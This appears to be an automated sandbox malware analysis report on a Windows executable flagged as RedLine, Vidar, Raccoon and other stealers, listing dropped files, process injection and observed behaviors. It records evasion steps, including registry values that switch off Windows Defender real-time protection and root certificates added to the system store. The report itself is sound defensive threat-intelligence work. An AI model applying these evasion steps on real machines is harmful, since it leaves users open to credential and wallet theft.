Malware Analysis Report

2024-11-13 19:46

Sample ID 220806-tj3gzagdgl
Target CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe
SHA256 cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0
Tags
onlylogger privateloader redline socelars vidar 706 media26 aspackv2 discovery evasion infostealer loader main spyware stealer trojan dcrat raccoon 109c5b577d4bc7aa7c26c1a8a3b55988 @hfcdvjjdsxvb @stealfate druwe persistence rat vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0

Threat Level: Known bad

The file CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe was found to be: Known bad.

Malicious Activity Summary

RedLine

Process spawned unexpected child process

OnlyLogger

Socelars

Modifies Windows Defender Real-time Protection settings

Socelars payload

PrivateLoader

DcRat

RedLine payload

Vidar

Raccoon

Raccoon Stealer payload

Looks for VirtualBox Guest Additions in registry

Vidar Stealer

OnlyLogger payload

ASPack v2.12-2.42

Executes dropped EXE

Downloads MZ/PE file

Looks for VMWare Tools registry key

VMProtect packed file

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Maps connected drives based on registry

Looks up geolocation information via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Enumerates processes with tasklist

Modifies system certificate store

Creates scheduled task(s)

Checks SCSI registry key(s)

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-06 16:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-06 16:06

Reported

2022-08-06 16:08

Platform

win7-20220715-en

Max time kernel

109s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload


Socelars

stealer socelars

Socelars payload


Vidar

stealer vidar

OnlyLogger payload


Vidar Stealer

stealer

ASPack v2.12-2.42

aspackv2

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-335065374-4263250628-1829373619-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1672 set thread context of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1700 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 984 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
